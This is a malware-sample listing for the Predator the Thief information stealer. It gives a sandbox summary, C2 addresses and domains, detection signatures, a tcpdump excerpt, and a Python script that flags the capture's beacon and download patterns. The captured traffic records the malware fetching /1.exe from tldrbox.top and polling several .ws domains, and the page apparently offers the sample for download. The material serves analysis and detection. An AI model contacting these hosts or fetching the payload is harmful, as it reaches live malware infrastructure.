Date added: May 30, 2020 9:50 pm
Added by: admin
File size: 8 MB
Downloads: 3765
Predator the Thief is an information stealer: malware that collects data from infected systems. The stealer can access the camera to spy on victims, steal saved passwords and login credentials, and take payment data from cryptocurrency wallets. The sandbox summary and tcpdump excerpt below come from a run of this sample on 2020-05-30 (the date in the capture timestamps).

Type:        Stealer
Origin:      ex-USSR
First seen:  1 July, 2018
Last seen:   29 May, 2020
Connections

PID   Process      IP                  ASN                  CN  Reputation
2492  uplads.exe   185.136.169.150:80  -                    DE  malicious
2576  MSIE711.tmp  88.99.66.31:443     Hetzner Online GmbH  DE  malicious
932   dllhost.exe  217.8.117.63:80     -                    -   malicious

DNS requests

Domain        IP           Reputation
iplogger.org  88.99.66.31  shared

Threats

PID   Process      Class                          Message
2492  uplads.exe   A Network Trojan was detected  STEALER [PTsecurity] Win32/Spy.Agent.PLQ (Predator Stealer) CnC Checkin
932   dllhost.exe  A Network Trojan was detected  STEALER [PTsecurity] Win32/Spy.Agent.PLQ (Predator Stealer) CnC Checkin
Packet capture (tcpdump -A excerpt; the raw IP/TCP header bytes that tcpdump prints before each payload have been stripped)

2020-05-30 09:10:05.558831 IP 10.1.10.15.49762 > 217.8.117.63.80: Flags [P.], seq 1:495, ack 1, win 16425, length 494: HTTP: GET /1.exe HTTP/1.1
GET /1.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Range: bytes=202682-
Unless-Modified-Since: Sat, 30 May 2020 02:28:46 GMT
If-Range: "5ed1c4de-de000"
Host: tldrbox.top
Connection: Keep-Alive

2020-05-30 09:11:24.486820 IP 10.1.10.15.49773 > 64.70.19.203.80: Flags [P.], seq 1:198, ack 1, win 64860, length 197: HTTP: GET /1 HTTP/1.1
GET /1 HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A5370a Safari/604.1
Host: toeghaiofiehfihf.ws

2020-05-30 09:11:24.581340 IP 64.70.19.203.80 > 10.1.10.15.49773: Flags [.], ack 198, win 13936, length 0
2020-05-30 09:11:24.582243 IP 64.70.19.203.80 > 10.1.10.15.49773: Flags [F.], seq 1, ack 198, win 13936, length 0
2020-05-30 09:11:24.582431 IP 10.1.10.15.49773 > 64.70.19.203.80: Flags [.], ack 2, win 64860, length 0
2020-05-30 09:11:24.582560 IP 10.1.10.15.49773 > 64.70.19.203.80: Flags [F.], seq 198, ack 2, win 64860, length 0
2020-05-30 09:11:24.674548 IP 64.70.19.203.80 > 10.1.10.15.49773: Flags [.], ack 199, win 13936, length 0
2020-05-30 09:11:24.686266 IP 10.1.10.15.49775 > 64.70.19.203.80: Flags [S], seq 764056628, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
2020-05-30 09:11:24.686520 STP 802.1w, Rapid STP, Flags [Learn, Forward, Agreement], bridge-id 8000.00:9a:d2:51:a3:82.803f, length 43
2020-05-30 09:11:24.774426 IP 64.70.19.203.80 > 10.1.10.15.49775: Flags [S.], seq 2516359664, ack 764056629, win 14600, options [mss 1380], length 0
2020-05-30 09:11:24.774676 IP 10.1.10.15.49775 > 64.70.19.203.80: Flags [.], ack 1, win 64860, length 0

2020-05-30 09:11:24.774840 IP 10.1.10.15.49775 > 64.70.19.203.80: Flags [P.], seq 1:198, ack 1, win 64860, length 197: HTTP: GET /2 HTTP/1.1
GET /2 HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A5370a Safari/604.1
Host: toeghaiofiehfihf.ws

2020-05-30 09:11:25.054712 IP 10.1.10.15.49776 > 64.70.19.203.80: Flags [P.], seq 1:198, ack 1, win 64860, length 197: HTTP: GET /3 HTTP/1.1
GET /3 HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A5370a Safari/604.1
Host: toeghaiofiehfihf.ws

2020-05-30 09:11:25.338839 IP 10.1.10.15.49777 > 64.70.19.203.80: Flags [P.], seq 1:198, ack 1, win 64860, length 197: HTTP: GET /4 HTTP/1.1
GET /4 HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A5370a Safari/604.1
Host: toeghaiofiehfihf.ws

2020-05-30 09:11:25.634919 IP 10.1.10.15.49778 > 64.70.19.203.80: Flags [P.], seq 1:198, ack 1, win 64860, length 197: HTTP: GET /5 HTTP/1.1
GET /5 HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A5370a Safari/604.1
Host: toeghaiofiehfihf.ws

2020-05-30 09:11:25.915797 IP 10.1.10.15.49779 > 64.70.19.203.80: Flags [P.], seq 1:198, ack 1, win 64860, length 197: HTTP: GET /6 HTTP/1.1
GET /6 HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A5370a Safari/604.1
Host: toeghaiofiehfihf.ws

2020-05-30 09:11:26.210240 IP 10.1.10.15.49780 > 64.70.19.203.80: Flags [P.], seq 1:198, ack 1, win 64860, length 197: HTTP: GET /7 HTTP/1.1
GET /7 HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A5370a Safari/604.1
Host: toeghaiofiehfihf.ws

2020-05-30 09:11:26.490418 IP 10.1.10.15.49781 > 64.70.19.203.80: Flags [P.], seq 1:198, ack 1, win 16560, length 197: HTTP: GET /8 HTTP/1.1
GET /8 HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A5370a Safari/604.1
Host: toeghaiofiehfihf.ws

2020-05-30 09:11:26.948325 IP 10.1.10.15.49782 > 64.70.19.203.80: Flags [P.], seq 1:198, ack 1, win 64860, length 197: HTTP: GET /1 HTTP/1.1
GET /1 HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A5370a Safari/604.1
Host: toirgsiorgididii.ws

2020-05-30 09:11:29.467097 IP 10.1.10.15.49790 > 64.70.19.203.80: Flags [P.], seq 1:198, ack 1, win 16560, length 197: HTTP: GET /1 HTTP/1.1
GET /1 HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A5370a Safari/604.1
Host: tefiefijiejdijef.ws

2020-05-30 09:11:31.927173 IP 10.1.10.15.49798 > 64.70.19.203.80: Flags [P.], seq 1:198, ack 1, win 64860, length 197: HTTP: GET /1 HTTP/1.1
GET /1 HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A5370a Safari/604.1
Host: tinbeafbiaebfiie.ws

2020-05-30 09:11:36.856234 IP 10.1.10.15.49814 > 64.70.19.203.80: Flags [P.], seq 1:198, ack 1, win 64860, length 197: HTTP: GET /1 HTTP/1.1
GET /1 HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A5370a Safari/604.1
Host: tpleflpokadkeoot.ws

2020-05-30 09:12:14.943782 IP 10.1.10.15.50028 > 64.70.19.203.80: Flags [P.], seq 1:201, ack 1, win 64860, length 200: HTTP: GET /pe/7 HTTP/1.1
GET /pe/7 HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A5370a Safari/604.1
Host: tgauheudbbchaiii.ws
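Read end to end, the capture shows three things worth turning into checks. First, the connection the sandbox table attributes to dllhost.exe (217.8.117.63:80) is a fetch of /1.exe from tldrbox.top with a Range and If-Range pair, i.e. a resumed payload download, under a Windows 7 / IE8 User-Agent. Second, about a minute later the same client walks GET /1 through /8 against toeghaiofiehfihf.ws and then GET /1 (and finally /pe/7) against more 16-letter .ws names beginning with "t", all at 64.70.19.203, now with an iPhone Safari User-Agent and nothing beyond User-Agent and Host in the request. Third, the server at 64.70.19.203 acknowledges the request and closes the connection without sending any data, so these names should be treated as candidate C2 domains rather than confirmed ones. The script below is an added example, not code from the page; it parses this tcpdump -A layout and flags those three patterns. LOG is a constructed subset of the capture above (raw header bytes omitted, a few packets dropped), and the thresholds in the flag_* functions are assumptions.

```python
"""Parse the tcpdump -A excerpt above and flag the request patterns it shows.
Added example, not code from the original page. LOG is a constructed subset of
the capture on this page (packet summaries plus HTTP request headers, binary
header bytes omitted); the thresholds in the flag_* functions are assumptions."""
import re
from collections import defaultdict
from datetime import datetime

LOG = """\
2020-05-30 09:10:05.558831 IP 10.1.10.15.49762 > 217.8.117.63.80: Flags [P.], seq 1:495, ack 1, win 16425, length 494: HTTP: GET /1.exe HTTP/1.1
GET /1.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Range: bytes=202682-
If-Range: "5ed1c4de-de000"
Host: tldrbox.top
2020-05-30 09:11:24.486820 IP 10.1.10.15.49773 > 64.70.19.203.80: Flags [P.], seq 1:198, ack 1, win 64860, length 197: HTTP: GET /1 HTTP/1.1
GET /1 HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A5370a Safari/604.1
Host: toeghaiofiehfihf.ws
2020-05-30 09:11:24.582243 IP 64.70.19.203.80 > 10.1.10.15.49773: Flags [F.], seq 1, ack 198, win 13936, length 0
2020-05-30 09:11:24.686520 STP 802.1w, Rapid STP, Flags [Learn, Forward, Agreement], bridge-id 8000.00:9a:d2:51:a3:82.803f, length 43
2020-05-30 09:11:24.774840 IP 10.1.10.15.49775 > 64.70.19.203.80: Flags [P.], seq 1:198, ack 1, win 64860, length 197: HTTP: GET /2 HTTP/1.1
GET /2 HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A5370a Safari/604.1
Host: toeghaiofiehfihf.ws
2020-05-30 09:11:26.948325 IP 10.1.10.15.49782 > 64.70.19.203.80: Flags [P.], seq 1:198, ack 1, win 64860, length 197: HTTP: GET /1 HTTP/1.1
GET /1 HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A5370a Safari/604.1
Host: toirgsiorgididii.ws
2020-05-30 09:12:14.943782 IP 10.1.10.15.50028 > 64.70.19.203.80: Flags [P.], seq 1:201, ack 1, win 64860, length 200: HTTP: GET /pe/7 HTTP/1.1
GET /pe/7 HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A5370a Safari/604.1
Host: tgauheudbbchaiii.ws
"""

SUMMARY = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+) IP "
    r"(?P<src>\d+\.\d+\.\d+\.\d+)\.(?P<sport>\d+) > (?P<dst>\d+\.\d+\.\d+\.\d+)\.(?P<dport>\d+):"
    r".*HTTP: (?P<method>[A-Z]+) (?P<path>\S+) HTTP/")
HEADER = re.compile(r"^([A-Za-z-]+): (.*)$")

def parse_requests(text):
    """One dict per HTTP request: the packet summary fields plus its headers (keys lowercased)."""
    requests, current = [], None
    for line in text.splitlines():
        m = SUMMARY.match(line)
        if m:                                   # packet summary that carries an HTTP request
            current = dict(m.groupdict(), headers={})
            current["ts"] = datetime.strptime(current["ts"], "%Y-%m-%d %H:%M:%S.%f")
            requests.append(current)
        elif line[:4].isdigit():                # any other packet (ACK, FIN, STP) ends the payload
            current = None
        elif current is not None and (h := HEADER.match(line)):
            current["headers"][h.group(1).lower()] = h.group(2)
    return requests

def flag_resumed_exe(requests):
    """Range/If-Range fetch of an .exe: a resumed payload download, as with /1.exe above."""
    return [("resumed-exe", r["headers"].get("host"), r["path"], r["headers"]["range"])
            for r in requests if r["path"].lower().endswith(".exe") and "range" in r["headers"]]

def flag_ua_switch(requests):
    """One client presenting both a Windows desktop and an iPhone User-Agent."""
    seen = defaultdict(set)
    for r in requests:
        seen[r["src"]].add(r["headers"].get("user-agent", ""))
    return [("ua-switch", src, sorted(uas)) for src, uas in seen.items()
            if any("Windows NT" in u for u in uas) and any("iPhone" in u for u in uas)]

def flag_fanout(requests, min_hosts=3, window_s=120):
    """Several distinct Host names for one server IP inside a short window (thresholds assumed):
    the 16-letter .ws names above all land on 64.70.19.203."""
    by_dst = defaultdict(list)
    for r in requests:
        if "host" in r["headers"]:
            by_dst[r["dst"]].append(r)
    findings = []
    for dst, rs in by_dst.items():
        hosts = sorted({r["headers"]["host"] for r in rs})
        span = (max(r["ts"] for r in rs) - min(r["ts"] for r in rs)).total_seconds()
        if len(hosts) >= min_hosts and span <= window_s:
            findings.append(("host-fanout", dst, hosts))
    return findings

def flag_bare_numeric(requests):
    """GET of a bare numeric path with nothing beyond User-Agent and Host: the beacon shape above."""
    return [("bare-numeric-get", r["headers"].get("host"), r["path"]) for r in requests
            if re.fullmatch(r"/(?:pe/)?\d+", r["path"]) and set(r["headers"]) <= {"user-agent", "host"}]

def analyse(text=LOG):
    reqs = parse_requests(text)
    return flag_resumed_exe(reqs) + flag_ua_switch(reqs) + flag_fanout(reqs) + flag_bare_numeric(reqs)

if __name__ == "__main__":
    print(*analyse(), sep="\n")
```

Run it against the full capture by piping `tcpdump -A -r sample.pcap 'tcp port 80'` output into parse_requests; the parser only needs the summary line and the header lines that follow it, so the binary header bytes tcpdump prints in between are ignored. The fan-out check is the one most worth tuning: a CDN front end legitimately serves many hostnames from one IP, so in production pair it with a name-shape filter (here, 16 lowercase letters under .ws) or with the "server closed without data" observation rather than using it alone.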